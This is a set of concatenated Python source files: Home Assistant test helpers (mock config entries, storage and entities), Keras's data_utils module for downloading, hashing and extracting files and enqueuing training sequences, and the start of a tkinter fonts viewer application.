connection_class=config_entries.CONN_CLASS_UNKNOWN, unique_id=None, ): """Initialize a mock config entry.""" kwargs = { "entry_id": entry_id or uuid.uuid4().hex, "domain": domain, "data": data or {}, "system_options": system_options, "options": options, "version": version, "title": title, "connection_class": connection_class, 
"unique_id": unique_id, } if source is not None: kwargs["source"] = source if state is not None: kwargs["state"] = state super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" hass.config_entries._entries.append(self) def add_to_manager(self, manager): """Test helper to add entry to entry manager.""" manager._entries.append(self) def patch_yaml_files(files_dict, endswith=True): """Patch load_yaml with a dictionary of yaml files.""" # match using endswith, start search with longest string matchlist = sorted(list(files_dict.keys()), key=len) if endswith else [] def mock_open_f(fname, **_): """Mock open() in the yaml module, used by load_yaml.""" # Return the mocked file on full match if fname in files_dict: _LOGGER.debug("patch_yaml_files match %s", fname) res = StringIO(files_dict[fname]) setattr(res, "name", fname) return res # Match using endswith for ends in matchlist: if fname.endswith(ends): _LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname) res = StringIO(files_dict[ends]) setattr(res, "name", fname) return res # Fallback for hass.components (i.e. services.yaml) if "homeassistant/components" in fname: _LOGGER.debug("patch_yaml_files using real file: %s", fname) return open(fname, encoding="utf-8") # Not found raise FileNotFoundError(f"File not found: {fname}") return patch.object(yaml_loader, "open", mock_open_f, create=True) def mock_coro(return_value=None, exception=None): """Return a coro that returns a value or raise an exception.""" fut = asyncio.Future() if exception is not None: fut.set_exception(exception) else: fut.set_result(return_value) return fut @contextmanager def assert_setup_component(count, domain=None): """Collect valid configuration from setup_component. - count: The amount of valid platforms that should be setup - domain: The domain to count is optional. 
It can be automatically determined most of the time Use as a context manager around setup.setup_component with assert_setup_component(0) as result_config: setup_component(hass, domain, start_config) # using result_config is optional """ config = {} async def mock_psc(hass, config_input, integration): """Mock the prepare_setup_component to capture config.""" domain_input = integration.domain res = await async_process_component_config(hass, config_input, integration) config[domain_input] = None if res is None else res.get(domain_input) _LOGGER.debug( "Configuration for %s, Validated: %s, Original %s", domain_input, config[domain_input], config_input.get(domain_input), ) return res assert isinstance(config, dict) with patch("homeassistant.config.async_process_component_config", mock_psc): yield config if domain is None: assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format( list(config.keys()) ) domain = list(config.keys())[0] res = config.get(domain) res_len = 0 if res is None else len(res) assert ( res_len == count ), f"setup_component failed, expected {count} got {res_len}: {res}" def init_recorder_component(hass, add_config=None): """Initialize the recorder.""" config = dict(add_config) if add_config else {} config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB with patch("homeassistant.components.recorder.migration.migrate_schema"): assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config}) assert recorder.DOMAIN in hass.config.components _LOGGER.info("In-memory recorder successfully started") def mock_restore_cache(hass, states): """Mock the DATA_RESTORE_CACHE.""" key = restore_state.DATA_RESTORE_STATE_TASK data = restore_state.RestoreStateData(hass) now = date_util.utcnow() last_states = {} for state in states: restored_state = state.as_dict() restored_state["attributes"] = json.loads( json.dumps(restored_state["attributes"], cls=JSONEncoder) ) last_states[state.entity_id] = restore_state.StoredState( 
State.from_dict(restored_state), now ) data.last_states = last_states _LOGGER.debug("Restore cache: %s", data.last_states) assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}" hass.data[key] = data class MockEntity(entity.Entity): """Mock Entity class.""" def __init__(self, **values): """Initialize an entity.""" self._values = values if "entity_id" in values: self.entity_id = values["entity_id"] @property def name(self): """Return the name of the entity.""" return self._handle("name") @property def should_poll(self): """Return the ste of the polling.""" return self._handle("should_poll") @property def unique_id(self): """Return the unique ID of the entity.""" return self._handle("unique_id") @property def state(self): """Return the state of the entity.""" return self._handle("state") @property def available(self): """Return True if entity is available.""" return self._handle("available") @property def device_info(self): """Info how it links to a device.""" return self._handle("device_info") @property def device_class(self): """Info how device should be classified.""" return self._handle("device_class") @property def unit_of_measurement(self): """Info on the units the entity state is in.""" return self._handle("unit_of_measurement") @property def capability_attributes(self): """Info about capabilities.""" return self._handle("capability_attributes") @property def supported_features(self): """Info about supported features.""" return self._handle("supported_features") @property def entity_registry_enabled_default(self): """Return if the entity should be enabled when first added to the entity registry.""" return self._handle("entity_registry_enabled_default") def _handle(self, attr): """Return attribute value.""" if attr in self._values: return self._values[attr] return getattr(super(), attr) @contextmanager def mock_storage(data=None): """Mock storage. 
Data is a dict {'key': {'version': version, 'data': data}} Written data will be converted to JSON to ensure JSON parsing works. """ if data is None: data = {} orig_load = storage.Store._async_load async def mock_async_load(store): """Mock version of load.""" if store._data is None: # No data to load if store.key not in data: return None mock_data = data.get(store.key) if "data" not in mock_data or "version" not in mock_data: _LOGGER.error('Mock data needs "version" and "data"') raise ValueError('Mock data needs "version" and "data"') store._data = mock_data # Route through original load so that we trigger migration loaded = await orig_load(store) _LOGGER.info("Loading data for %s: %s", store.key, loaded) return loaded def mock_write_data(store, path, data_to_write): """Mock version of write data.""" _LOGGER.info("Writing data to %s: %s", store.key, data_to_write) # To ensure that the data can be serialized data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder)) async def mock_remove(store): """Remove data.""" data.pop(store.key, None) with patch( "homeassistant.helpers.storage.Store._async_load", side_effect=mock_async_load, autospec=True, ), patch( "homeassistant.helpers.storage.Store._write_data", side_effect=mock_write_data, autospec=True, ), patch( "homeassistant.helpers.storage.Store.async_remove", side_effect=mock_remove, autospec=True, ): yield data async def flush_store(store): """Make sure all delayed writes of a store are written.""" if store._data is None: return store._async_cleanup_final_write_listener() store._async_cleanup_delay_listener() await store._async_handle_write_data() async def get_system_health_info(hass, domain): """Get system health info.""" return await hass.data["system_health"]["info"][domain](hass) def mock_integration(hass, module): """Mock an integration.""" integration = loader.Integration( hass, f"homeassistant.components.{module.DOMAIN}", None, module.mock_manifest() ) def mock_import_platform(platform_name): 
raise ImportError( f"Mocked unable to import platform '{platform_name}'", name=f"{integration.pkg_path}.{platform_name}", ) integration._import_platform = mock_import_platform _LOGGER.info("Adding mock integration: %s", module.DOMAIN) hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module return integration def mock_entity_platform(hass, platform_path, module): """Mock a entity platform. platform_path is in form light.hue. Will create platform hue.light. """ domain, platform_name = platform_path.split(".") mock_platform(hass, f"{platform_name}.{domain}", module) def mock_platform(hass, platform_path, module=None): """Mock a platform. platform_path is in form hue.config_flow. """ domain, platform_name = platform_path.split(".") integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {}) module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {}) if domain not in integration_cache: mock_integration(hass, MockModule(domain)) _LOGGER.info("Adding mock integration platform: %s", platform_path) module_cache[platform_path] = module or Mock() def async_capture_events(hass, event_name): """Create a helper that captures events.""" events = [] @ha.callback def capture_events(event): events.append(event) hass.bus.async_listen(event_name, capture_events) return events @ha.callback def async_mock_signal(hass, signal): """Catch all dispatches to a signal.""" calls = [] @ha.callback def mock_signal_handler(*args): """Mock service call.""" calls.append(args) hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler) return calls class hashdict(dict): """ hashable dict implementation, suitable for use as a key into other dicts. 
>>> h1 = hashdict({"apples": 1, "bananas":2}) >>> h2 = hashdict({"bananas": 3, "mangoes": 5}) >>> h1+h2 hashdict(apples=1, bananas=3, mangoes=5) >>> d1 = {} >>> d1[h1] = "salad" >>> d1[h1] 'salad' >>> d1[h2] Traceback (most recent call last): ... KeyError: hashdict(bananas=3, mangoes=5) based on answers from http://stackoverflow.com/questions/1151658/python-hashable-dicts """ def __key(self): return tuple(sorted(self.items())) def __repr__(self): # noqa: D105 no docstring return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key()) def __hash__(self): # noqa: D105 no docstring return hash(self.__key()) def __setitem__(self, key, value): # noqa: D105 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def __delitem__(self, key): # noqa: D105 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def clear(self): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def pop(self, *args, **kwargs): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def popitem(self, *args, **kwargs): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def setdefault(self, *args, **kwargs): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def update(self, *args, **kwargs): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") # update is not ok because it mutates the object # __add__ is ok because it creates a new object # while the new object is under construction, it's ok to mutate it def __add__(self, right): # noqa: D105 no docstring result = hashdict(self) dict.update(result, right) return result def assert_lists_same(a, b): """Compare two lists, ignoring order.""" assert collections.Counter([hashdict(i) for i in a]) == collections.Counter( 
[hashdict(i) for i in b] )
# ---- file boundary: the following content is keras/utils/data_utils.py ----
"""Utilities for file download and caching.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import hashlib import multiprocessing as mp import os import random import shutil import sys import tarfile import threading import time import traceback import zipfile from abc import abstractmethod from contextlib import closing from multiprocessing.pool import ThreadPool import numpy as np import six from six.moves.urllib.error import HTTPError from six.moves.urllib.error import URLError from six.moves.urllib.request import urlopen try: import queue except ImportError: import Queue as queue from ..utils.generic_utils import Progbar if sys.version_info[0] == 2: def urlretrieve(url, filename, reporthook=None, data=None): """Replacement for `urlretrive` for Python 2. Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy `urllib` module, known to have issues with proxy management. # Arguments url: url to retrieve. filename: where to store the retrieved data locally. reporthook: a hook function that will be called once on establishment of the network connection and once after each block read thereafter. The hook will be passed three arguments; a count of blocks transferred so far, a block size in bytes, and the total size of the file. data: `data` argument passed to `urlopen`. 
""" def chunk_read(response, chunk_size=8192, reporthook=None): content_type = response.info().get('Content-Length') total_size = -1 if content_type is not None: total_size = int(content_type.strip()) count = 0 while True: chunk = response.read(chunk_size) count += 1 if reporthook is not None: reporthook(count, chunk_size, total_size) if chunk: yield chunk else: break with closing(urlopen(url, data)) as response, open(filename, 'wb') as fd: for chunk in chunk_read(response, reporthook=reporthook): fd.write(chunk) else: from six.moves.urllib.request import urlretrieve def _extract_archive(file_path, path='.', archive_format='auto'): """Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats. # Arguments file_path: path to the archive file path: path to extract the archive file archive_format: Archive format to try for extracting the file. Options are 'auto', 'tar', 'zip', and None. 'tar' includes tar, tar.gz, and tar.bz files. The default 'auto' is ['tar', 'zip']. None or an empty list will return no matches found. # Returns True if a match was found and an archive extraction was completed, False otherwise. 
""" if archive_format is None: return False if archive_format is 'auto': archive_format = ['tar', 'zip'] if isinstance(archive_format, six.string_types): archive_format = [archive_format] for archive_type in archive_format: if archive_type is 'tar': open_fn = tarfile.open is_match_fn = tarfile.is_tarfile if archive_type is 'zip': open_fn = zipfile.ZipFile is_match_fn = zipfile.is_zipfile if is_match_fn(file_path): with open_fn(file_path) as archive: try: archive.extractall(path) except (tarfile.TarError, RuntimeError, KeyboardInterrupt): if os.path.exists(path): if os.path.isfile(path): os.remove(path) else: shutil.rmtree(path) raise return True return False def get_file(fname, origin, untar=False, md5_hash=None, file_hash=None, cache_subdir='datasets', hash_algorithm='auto', extract=False, archive_format='auto', cache_dir=None): """Downloads a file from a URL if it not already in the cache. By default the file at the url `origin` is downloaded to the cache_dir `~/.keras`, placed in the cache_subdir `datasets`, and given the filename `fname`. The final location of a file `example.txt` would therefore be `~/.keras/datasets/example.txt`. Files in tar, tar.gz, tar.bz, and zip formats can also be extracted. Passing a hash will verify the file after download. The command line programs `shasum` and `sha256sum` can compute the hash. # Arguments fname: Name of the file. If an absolute path `/path/to/file.txt` is specified the file will be saved at that location. origin: Original URL of the file. untar: Deprecated in favor of 'extract'. boolean, whether the file should be decompressed md5_hash: Deprecated in favor of 'file_hash'. md5 hash of the file for verification file_hash: The expected hash string of the file after download. The sha256 and md5 hash algorithms are both supported. cache_subdir: Subdirectory under the Keras cache dir where the file is saved. If an absolute path `/path/to/folder` is specified the file will be saved at that location. 
hash_algorithm: Select the hash algorithm to verify the file. options are 'md5', 'sha256', and 'auto'. The default 'auto' detects the hash algorithm in use. extract: True tries extracting the file as an Archive, like tar or zip. archive_format: Archive format to try for extracting the file. Options are 'auto', 'tar', 'zip', and None. 'tar' includes tar, tar.gz, and tar.bz files. The default 'auto' is ['tar', 'zip']. None or an empty list will return no matches found. cache_dir: Location to store cached files, when None it defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored). # Returns Path to the downloaded file """ # noqa if cache_dir is None: cache_dir = os.path.join(os.path.expanduser('~'), '.keras') if md5_hash is not None and file_hash is None: file_hash = md5_hash hash_algorithm = 'md5' datadir_base = os.path.expanduser(cache_dir) if not os.access(datadir_base, os.W_OK): datadir_base = os.path.join('/tmp', '.keras') datadir = os.path.join(datadir_base, cache_subdir) if not os.path.exists(datadir): os.makedirs(datadir) if untar: untar_fpath = os.path.join(datadir, fname) fpath = untar_fpath + '.tar.gz' else: fpath = os.path.join(datadir, fname) download = False if os.path.exists(fpath): # File found; verify integrity if a hash was provided. if file_hash is not None: if not validate_file(fpath, file_hash, algorithm=hash_algorithm): print('A local file was found, but it seems to be ' 'incomplete or outdated because the ' + hash_algorithm + ' file hash does not match the original value of ' + file_hash + ' so we will re-download the data.') download = True else: download = True if download: print('Downloading data from', origin) class ProgressTracker(object): # Maintain progbar for the lifetime of download. # This design was chosen for Python 2.7 compatibility. 
progbar = None def dl_progress(count, block_size, total_size): if ProgressTracker.progbar is None: if total_size is -1: total_size = None ProgressTracker.progbar = Progbar(total_size) else: ProgressTracker.progbar.update(count * block_size) error_msg = 'URL fetch failure on {}: {} -- {}' try: try: urlretrieve(origin, fpath, dl_progress) except HTTPError as e: raise Exception(error_msg.format(origin, e.code, e.msg)) except URLError as e: raise Exception(error_msg.format(origin, e.errno, e.reason)) except (Exception, KeyboardInterrupt): if os.path.exists(fpath): os.remove(fpath) raise ProgressTracker.progbar = None if untar: if not os.path.exists(untar_fpath): _extract_archive(fpath, datadir, archive_format='tar') return untar_fpath if extract: _extract_archive(fpath, datadir, archive_format) return fpath def _hash_file(fpath, algorithm='sha256', chunk_size=65535): """Calculates a file sha256 or md5 hash. # Example ```python >>> from keras.data_utils import _hash_file >>> _hash_file('/path/to/file.zip') 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855' ``` # Arguments fpath: path to the file being validated algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'. The default 'auto' detects the hash algorithm in use. chunk_size: Bytes to read at a time, important for large files. # Returns The file hash """ if (algorithm is 'sha256') or (algorithm is 'auto' and len(hash) is 64): hasher = hashlib.sha256() else: hasher = hashlib.md5() with open(fpath, 'rb') as fpath_file: for chunk in iter(lambda: fpath_file.read(chunk_size), b''): hasher.update(chunk) return hasher.hexdigest() def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535): """Validates a file against a sha256 or md5 hash. # Arguments fpath: path to the file being validated file_hash: The expected hash string of the file. The sha256 and md5 hash algorithms are both supported. algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'. 
The default 'auto' detects the hash algorithm in use. chunk_size: Bytes to read at a time, important for large files. # Returns Whether the file is valid """ if ((algorithm is 'sha256') or (algorithm is 'auto' and len(file_hash) is 64)): hasher = 'sha256' else: hasher = 'md5' if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash): return True else: return False class Sequence(object): """Base object for fitting to a sequence of data, such as a dataset. Every `Sequence` must implement the `__getitem__` and the `__len__` methods. If you want to modify your dataset between epochs you may implement `on_epoch_end`. The method `__getitem__` should return a complete batch. # Notes `Sequence` are a safer way to do multiprocessing. This structure guarantees that the network will only train once on each sample per epoch which is not the case with generators. # Examples ```python from skimage.io import imread from skimage.transform import resize import numpy as np # Here, `x_set` is list of path to the images # and `y_set` are the associated classes. class CIFAR10Sequence(Sequence): def __init__(self, x_set, y_set, batch_size): self.x, self.y = x_set, y_set self.batch_size = batch_size def __len__(self): return int(np.ceil(len(self.x) / float(self.batch_size))) def __getitem__(self, idx): batch_x = self.x[idx * self.batch_size:(idx + 1) * self.batch_size] batch_y = self.y[idx * self.batch_size:(idx + 1) * self.batch_size] return np.array([ resize(imread(file_name), (200, 200)) for file_name in batch_x]), np.array(batch_y) ``` """ @abstractmethod def __getitem__(self, index): """Gets batch at position `index`. # Arguments index: position of the batch in the Sequence. # Returns A batch """ raise NotImplementedError @abstractmethod def __len__(self): """Number of batch in the Sequence. # Returns The number of batches in the Sequence. """ raise NotImplementedError def on_epoch_end(self): """Method called at the end of every epoch. 
""" pass def __iter__(self): """Create an infinite generator that iterate over the Sequence.""" while True: for item in (self[i] for i in range(len(self))): yield item # Global variables to be shared across processes _SHARED_SEQUENCES = {} # We use a Value to provide unique id to different processes. _SEQUENCE_COUNTER = None def init_pool(seqs): global _SHARED_SEQUENCES _SHARED_SEQUENCES = seqs def get_index(uid, i): """Get the value from the Sequence `uid` at index `i`. To allow multiple Sequences to be used at the same time, we use `uid` to get a specific one. A single Sequence would cause the validation to overwrite the training Sequence. # Arguments uid: int, Sequence identifier i: index # Returns The value at index `i`. """ return _SHARED_SEQUENCES[uid][i] class SequenceEnqueuer(object): """Base class to enqueue inputs. The task of an Enqueuer is to use parallelism to speed up preprocessing. This is done with processes or threads. # Examples ```python enqueuer = SequenceEnqueuer(...) enqueuer.start() datas = enqueuer.get() for data in datas: # Use the inputs; training, evaluating, predicting. # ... stop sometime. enqueuer.close() ``` The `enqueuer.get()` should be an infinite stream of datas. """ @abstractmethod def is_running(self): raise NotImplementedError @abstractmethod def start(self, workers=1, max_queue_size=10): """Starts the handler's workers. # Arguments workers: number of worker threads max_queue_size: queue size (when full, threads could block on `put()`). """ raise NotImplementedError @abstractmethod def stop(self, timeout=None): """Stop running threads and wait for them to exit, if necessary. Should be called by the same thread which called start(). # Arguments timeout: maximum time to wait on thread.join() """ raise NotImplementedError @abstractmethod def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. # Returns Generator yielding tuples `(inputs, targets)` or `(inputs, targets, sample_weights)`. 
""" raise NotImplementedError class OrderedEnqueuer(SequenceEnqueuer): """Builds a Enqueuer from a Sequence. Used in `fit_generator`, `evaluate_generator`, `predict_generator`. # Arguments sequence: A `keras.utils.data_utils.Sequence` object. use_multiprocessing: use multiprocessing if True, otherwise threading shuffle: whether to shuffle the data at the beginning of each epoch """ def __init__(self, sequence, use_multiprocessing=False, shuffle=False): self.sequence = sequence self.use_multiprocessing = use_multiprocessing global _SEQUENCE_COUNTER if _SEQUENCE_COUNTER is None: try: _SEQUENCE_COUNTER = mp.Value('i', 0) except OSError: # In this case the OS does not allow us to use # multiprocessing. We resort to an int # for enqueuer indexing. _SEQUENCE_COUNTER = 0 if isinstance(_SEQUENCE_COUNTER, int): self.uid = _SEQUENCE_COUNTER _SEQUENCE_COUNTER += 1 else: # Doing Multiprocessing.Value += x is not process-safe. with _SEQUENCE_COUNTER.get_lock(): self.uid = _SEQUENCE_COUNTER.value _SEQUENCE_COUNTER.value += 1 self.shuffle = shuffle self.workers = 0 self.executor_fn = None self.queue = None self.run_thread = None self.stop_signal = None def is_running(self): return self.stop_signal is not None and not self.stop_signal.is_set() def start(self, workers=1, max_queue_size=10): """Start the handler's workers. # Arguments workers: number of worker threads max_queue_size: queue size (when full, workers could block on `put()`) """ if self.use_multiprocessing: self.executor_fn = lambda seqs: mp.Pool(workers, initializer=init_pool, initargs=(seqs,)) else: # We do not need the init since it's threads. 
self.executor_fn = lambda _: ThreadPool(workers) self.workers = workers self.queue = queue.Queue(max_queue_size) self.stop_signal = threading.Event() self.run_thread = threading.Thread(target=self._run) self.run_thread.daemon = True self.run_thread.start() def _wait_queue(self): """Wait for the queue to be empty.""" while True: time.sleep(0.1) if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set(): return def _run(self): """Submits request to the executor and queue the `Future` objects.""" sequence = list(range(len(self.sequence))) self._send_sequence() # Share the initial sequence while True: if self.shuffle: random.shuffle(sequence) with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor: for i in sequence: if self.stop_signal.is_set(): return self.queue.put( executor.apply_async(get_index, (self.uid, i)), block=True) # Done with the current epoch, waiting for the final batches self._wait_queue() if self.stop_signal.is_set(): # We're done return # Call the internal on epoch end. self.sequence.on_epoch_end() self._send_sequence() # Update the pool def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. # Yields The next element in the queue, i.e. a tuple `(inputs, targets)` or `(inputs, targets, sample_weights)`. """ try: while self.is_running(): inputs = self.queue.get(block=True).get() self.queue.task_done() if inputs is not None: yield inputs except Exception as e: self.stop() six.raise_from(StopIteration(e), e) def _send_sequence(self): """Send current Sequence to all workers.""" # For new processes that may spawn _SHARED_SEQUENCES[self.uid] = self.sequence def stop(self, timeout=None): """Stops running threads and wait for them to exit, if necessary. Should be called by the same thread which called `start()`. 
# Arguments timeout: maximum time to wait on `thread.join()` """ self.stop_signal.set() with self.queue.mutex: self.queue.queue.clear() self.queue.unfinished_tasks = 0 self.queue.not_full.notify() self.run_thread.join(timeout) _SHARED_SEQUENCES[self.uid] = None class GeneratorEnqueuer(SequenceEnqueuer): """Builds a queue out of a data generator. The provided generator can be finite in which case the class will throw a `StopIteration` exception. Used in `fit_generator`, `evaluate_generator`, `predict_generator`. # Arguments generator: a generator function which yields data use_multiprocessing: use multiprocessing if True, otherwise threading wait_time: time to sleep in-between calls to `put()` random_seed: Initial seed for workers, will be incremented by one for each worker. """ def __init__(self, generator, use_multiprocessing=False, wait_time=0.05, seed=None): self.wait_time = wait_time self._generator = generator if os.name is 'nt' and use_multiprocessing is True: # On Windows, avoid **SYSTEMATIC** error in `multiprocessing`: # `TypeError: can't pickle generator objects` # => Suggest multithreading instead of multiprocessing on Windows raise ValueError('Using a generator with `use_multiprocessing=True`' ' is not supported on Windows (no marshalling of' ' generators across process boundaries). 
Instead,' ' use single thread/process or multithreading.') else: self._use_multiprocessing = use_multiprocessing self._threads = [] self._stop_event = None self._manager = None self.queue = None self.seed = seed def _data_generator_task(self): if self._use_multiprocessing is False: while not self._stop_event.is_set(): with self.genlock: try: if (self.queue is not None and self.queue.qsize() < self.max_queue_size): # On all OSes, avoid **SYSTEMATIC** error # in multithreading mode: # `ValueError: generator already executing` # => Serialize calls to # infinite iterator/generator's next() function generator_output = next(self._generator) self.queue.put((True, generator_output)) else: time.sleep(self.wait_time) except StopIteration: break except Exception as e: # Can't pickle tracebacks. # As a compromise, print the traceback and # pickle None instead. if not hasattr(e, '__traceback__'): setattr(e, '__traceback__', sys.exc_info()[2]) self.queue.put((False, e)) self._stop_event.set() break else: while not self._stop_event.is_set(): try: if (self.queue is not None and self.queue.qsize() < self.max_queue_size): generator_output = next(self._generator) self.queue.put((True, generator_output)) else: time.sleep(self.wait_time) except StopIteration: break except Exception as e: # Can't pickle tracebacks. # As a compromise, print the traceback and pickle None instead. traceback.print_exc() setattr(e, '__traceback__', None) self.queue.put((False, e)) self._stop_event.set() break def start(self, workers=1, max_queue_size=10): """Kicks off threads which add data from the generator into the queue. 
# Arguments workers: number of worker threads max_queue_size: queue size (when full, threads could block on `put()`) """ try: self.max_queue_size = max_queue_size if self._use_multiprocessing: self._manager = mp.Manager() self.queue = self._manager.Queue(maxsize=max_queue_size) self._stop_event = mp.Event() else: # On all OSes, avoid **SYSTEMATIC** error in multithreading mode: # `ValueError: generator already executing` # => Serialize calls to infinite iterator/generator's next() function self.genlock = threading.Lock() self.queue = queue.Queue(maxsize=max_queue_size) self._stop_event = threading.Event() for _ in range(workers): if self._use_multiprocessing: # Reset random seed else all children processes # share the same seed np.random.seed(self.seed) thread = mp.Process(target=self._data_generator_task) thread.daemon = True if self.seed is not None: self.seed += 1 else: thread = threading.Thread(target=self._data_generator_task) self._threads.append(thread) thread.start() except: self.stop() raise def is_running(self): return self._stop_event is not None and not self._stop_event.is_set() def stop(self, timeout=None): """Stops running threads and wait for them to exit, if necessary. Should be called by the same thread which called `start()`. # Arguments timeout: maximum time to wait on `thread.join()`. """ if self.is_running(): self._stop_event.set() for thread in self._threads: if self._use_multiprocessing: if thread.is_alive(): thread.terminate() else: # The thread.is_alive() test is subject to a race condition: # the thread could terminate right after the test and before the # join, rendering this test meaningless -> Call thread.join() # always, which is ok no matter what the status of the thread. thread.join(timeout) if self._manager: self._manager.shutdown() self._threads = [] self._stop_event = None self.queue = None def get(self): """Creates a generator to extract data from the queue. Skip the data if it is `None`. 
# Yields The next element in the queue, i.e. a tuple `(inputs, targets)` or `(inputs, targets, sample_weights)`. """ while self.is_running(): if not self.queue.empty(): success, value = self.queue.get() # Rethrow any exceptions found in the queue if not success: six.reraise(value.__class__, value, value.__traceback__) # Yield regular values if value is not None: yield value else: all_finished = all([not thread.is_alive() for thread in self._threads]) if all_finished and self.queue.empty(): raise StopIteration() else: time.sleep(self.wait_time) # Make sure to rethrow the first exception in the queue, if any while not self.queue.empty(): success, value = self.queue.get() if not success: six.reraise(value.__class__, value, value.__traceback__)
tkinter_fonts_viewer.py
"""tkinter_fonts_viewer version, date, author: 0.1.1, 31.05.2020, streanger version, date, author: 0.1.2, 07.01.2022, streanger useful: https://stackoverflow.com/questions/5286093/display-listbox-with-columns-using-tkinter https://fsymbols.com/emoticons/ https://stackoverflow.com/questions/70538010/distributing-python-programs-with-a-tkinter-gui-using-pysintaller """ import os import time import json import string import ctypes from threading import Thread from itertools import cycle from tkinter import ( Tk, Frame, Label, Listbox, Entry, Button, StringVar, Scrollbar, Toplevel, messagebox, font, YES, NO, BOTH, TOP, BOTTOM, LEFT, RIGHT, X, Y, END, ) import pkg_resources def static_file_path(directory, file): """ get path of the specified file from specified directory""" resource_path = "/".join((directory, file)) # Do not use os.path.join() try: template = pkg_resources.resource_filename(__name__, resource_path) except KeyError: return ( "none" # empty string cause AttributeError, and non empty FileNotFoundError ) return template def fonts_type(): """get known fonst status""" fonts_file_path = static_file_path("fonts", "fonts_status.json") # read known fonts from json try: with open(fonts_file_path) as json_file: data = json.load(json_file) except FileNotFoundError: data = {} return data def viewer(): """main application gui""" app = TkinterFontsViewer(master=Tk(), resizable=True, hide_console=False) app.mainloop() class FontsMonoCheck(Frame): # pylint: disable=too-many-ancestors """class for testing fonts mono status https://stackoverflow.com/questions/4481880/minimizing-a-tk-window """ def __init__(self, master, fonts): super().__init__(master) self.master.geometry("30x30") self.master.iconify() # minimized window self.test_label = Label(self.master) self.test_label.pack(expand=NO, fill=Y, side=BOTTOM) # fonts = font.families() self.fonts = fonts self.fonts_mono_status = {} self.test_thread = Thread(target=self.check_fonts_thread, args=(self.fonts,)) 
self.test_thread.start() def cleanup(self): """join thread and destroy window""" self.test_thread.join() self.master.destroy() def check_fonts_thread(self, fonts): """check fonts in thread""" default_color = self.master.cget("bg") for checked_font in fonts: # set proper font test_font = font.Font(family=checked_font, size=11) # invisible color self.test_label.config(font=test_font, fg=default_color) # set '.' as text self.test_label.config(text=".") self.master.update() # this is needed for true width value dot_width = self.test_label.winfo_width() # set 'm' as text self.test_label.config(text="m") self.master.update() # this is needed for true width value m_width = self.test_label.winfo_width() # show & compare sizes status = bool(m_width == dot_width) # out[checked_font] = status self.fonts_mono_status[checked_font] = status self.test_label.pack_forget() self.master.update() # print('inside') time.sleep(0.01) self.master.quit() self.master.update() class TkinterFontsViewer(Frame): # pylint: disable=too-many-ancestors """gui viewer for tkinter fonts""" def __init__(self, master, resizable=True, hide_console=False): # *********** INIT, HIDE, CLOSING *********** if hide_console: self.hide_console() super().__init__(master) self.master.protocol("WM_DELETE_WINDOW", self.on_closing) self.master.geometry("{}x{}+333+50".format(800, 500)) if resizable: self.master.resizable(width=True, height=True) else: self.master.resizable(width=False, height=False) self.master.wm_title("tkinter fonts viewer") self.pack() # *********** APP GUI, CONST, VARIABLES *********** if os.name == "nt": app_font = "Lucida console" else: app_font = "FreeMono" # raised, sunken, flat, ridge, solid, groove self.RELIEF_TYPE = "groove" self.MONO_FONT_INFO = font.Font(family=app_font, size=10, weight="normal") self.MONO_BUTTON = font.Font(family=app_font, size=25, weight="normal") self.MONO_FONT_INFO_UPPER = font.Font(family=app_font, size=12, weight="normal") self.user_text = "" self.test_examples = 
cycle( [ "\n".join( [ string.digits, string.ascii_lowercase, string.ascii_uppercase, string.punctuation, ] ), "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam...", "I know I can do it, Todd Downey said, helping himself to another ear of corn from the steaming bowl. I’m sure that in time, every bit of her will be gone, and her death will be a mystery. Even to me.", "If you haven't found something strange during the day, it hasn't been much of a day", "\n".join(["❄", "❄❄❄", "☃☃☃☃☃", "❄❄❄", "❄"]), r"¯\_( ͡❛ ͜ʖ ͡❛)_/¯", "", "tkinter fonts viewer", ] ) # *********** FONTS MONO STATUS *********** self.FONTS_MODE = 0 self.FONTS_MODES_DICT = { 0: "all", 1: "normal", 2: "mono", } self.ALL_FONTS = font.families() self.ALL_FONTS = sorted(list(set(self.ALL_FONTS))) # remove duplicates self.FONTS_MONOSPACE_STATUS = self.check_if_mono(self.ALL_FONTS) self.MONO_FONTS = [] self.NORMAL_FONTS = [] for key, value in self.FONTS_MONOSPACE_STATUS.items(): if value: self.MONO_FONTS.append(key) else: self.NORMAL_FONTS.append(key) self.FONTS_TO_SHOW = self.ALL_FONTS # current fonts to show self.FILTER = "" self.FONTS_FILTERED = self.filter_fonts( self.FONTS_TO_SHOW, self.FILTER # at start show all fonts ) self.NUMBER_OF_FONTS = len(self.FONTS_FILTERED) 